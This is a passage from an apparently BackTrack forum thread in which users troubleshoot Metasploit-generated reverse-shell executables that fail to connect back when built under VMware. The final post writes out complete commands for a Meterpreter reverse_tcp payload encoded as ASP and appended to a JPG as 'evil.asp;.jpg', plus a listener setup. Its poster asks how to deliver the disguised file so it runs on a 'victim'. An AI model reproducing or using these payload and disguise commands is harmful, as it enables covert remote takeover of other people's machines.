Page 2 of 2 FirstFirst 12
Results 11 to 15 of 15

Thread: ./msfencode ?

  1. #11
    Junior Member loop4me's Avatar
    Join Date
    Mar 2008
    Posts
    54

    Default

    .BigMac, _sinner thx for replay

    .maybe i wasn't clear enought about my problem .or it sounds confuzing, cause it is

    .there is no syntax error, problem .it doesn't really matter what encoder i use,
    i know i can choose between the offered ( ./msfencode -l ) ,combination of few too (ecsployt replay)
    .i even tried without msfencoder (X >output.exe) .etc

    .to be more specific ,there is no problem doing this outside vmware .on the bt4-pre installed on regular box, or boot from livecd on my laptop or other box .the 'output.exe' that has been made outside virtuel environment always works .no problem how it was made (syntax), what encoder do i use or am i sending it directly to (>) or with -o argument

    .BUT when i boot BT4-pre under vmware, it doesn't matter if it is installed (on vmware) or i'm just booting it form livecd the 'output.exe' that i made most likely is not going to connect back, the silly part is that i reboot the BT4-pre and do the same thing i did few minutes ago and sometimes ,just sometimes, the new 'output.exe' is connecting back .in most casses is not
    .and that's the confuzing part
    .i just wanna hear from someone that whenever he made output.exe under vmware, it's always connecting back

  2. #12
    Just burned his ISO
    Join Date
    Jun 2009
    Posts
    2

    Default

    Ok, I see what you're saying. I run BT4 under VMware also (XP as host), no problem for me. But I did notice in BT4 you need to assign an IP manually under VMWare... maybe check your ifconfig?

    Quote Originally Posted by loop4me View Post
    .BigMac, _sinner thx for replay

    .maybe i wasn't clear enought about my problem .or it sounds confuzing, cause it is

    .there is no syntax error, problem .it doesn't really matter what encoder i use,
    i know i can choose between the offered ( ./msfencode -l ) ,combination of few too (ecsployt replay)
    .i even tried without msfencoder (X >output.exe) .etc

    .to be more specific ,there is no problem doing this outside vmware .on the bt4-pre installed on regular box, or boot from livecd on my laptop or other box .the 'output.exe' that has been made outside virtuel environment always works .no problem how it was made (syntax), what encoder do i use or am i sending it directly to (>) or with -o argument

    .BUT when i boot BT4-pre under vmware, it doesn't matter if it is installed (on vmware) or i'm just booting it form livecd the 'output.exe' that i made most likely is not going to connect back, the silly part is that i reboot the BT4-pre and do the same thing i did few minutes ago and sometimes ,just sometimes, the new 'output.exe' is connecting back .in most casses is not
    .and that's the confuzing part
    .i just wanna hear from someone that whenever he made output.exe under vmware, it's always connecting back

  3. #13
    Developer
    Join Date
    Mar 2007
    Posts
    6,124

    Default

    Quote Originally Posted by loop4me View Post
    .BigMac, _sinner thx for replay

    .maybe i wasn't clear enought about my problem .or it sounds confuzing, cause it is

    .there is no syntax error, problem .it doesn't really matter what encoder i use,
    i know i can choose between the offered ( ./msfencode -l ) ,combination of few too (ecsployt replay)
    .i even tried without msfencoder (X >output.exe) .etc

    .to be more specific ,there is no problem doing this outside vmware .on the bt4-pre installed on regular box, or boot from livecd on my laptop or other box .the 'output.exe' that has been made outside virtuel environment always works .no problem how it was made (syntax), what encoder do i use or am i sending it directly to (>) or with -o argument

    .BUT when i boot BT4-pre under vmware, it doesn't matter if it is installed (on vmware) or i'm just booting it form livecd the 'output.exe' that i made most likely is not going to connect back, the silly part is that i reboot the BT4-pre and do the same thing i did few minutes ago and sometimes ,just sometimes, the new 'output.exe' is connecting back .in most casses is not
    .and that's the confuzing part
    .i just wanna hear from someone that whenever he made output.exe under vmware, it's always connecting back
    Man this is anoying to read Whats with the damn periods.

  4. #14
    Junior Member loop4me's Avatar
    Join Date
    Mar 2008
    Posts
    54

    Default

    Pureh@te this is just for you. From now ,i'm gonna write in human readable form.

  5. #15
    Just burned his ISO imported_miki_v6's Avatar
    Join Date
    Feb 2010
    Posts
    4

    Default

    I was read topic:
    h_t_t_p://blog.metasploit.com/2009/12/exploiting-microsoft-iis-with.html

    and I want to cat some jpg with file with reverse_tcp but it doesnt work for me.
    I wrote evil.aps with:

    $ msfpayload windows/meterpreter/reverse_tcp \ LHOST=192.168.1.3 LPORT=8443 R | ./msfencode -t asp evil.asp
    $ cat hacker.jpg evil.asp > "evil.asp;.jpg"

    On Konsole 2 run:

    $ msfconsole
    msf> use exploit/multi/handler
    msf (handler) > set PAYLOAD windows/meterpreter/reverse_tcp
    msf (handler) > set LHOST 192.168.1.3
    msf (handler) > set LPORT 8443
    msf (handler) > set ExitOnSession false
    msf (handler) > exploit -j

    And on PC Victim run evil.asp;.jpg but nothing happend

    What is wrong?

    I was wrote another file with command:

    ./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.3 LPORT=8443 X > /root/file.exe

    and run on Victim and its work I have reverse_tcp.

    Could anybody tell me how can I do file.asp and cat with some jpg or avi , send to my www and run on Victim to have reverse_tcp?
    I will be glad to answer

Page 2 of 2 FirstFirst 12

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •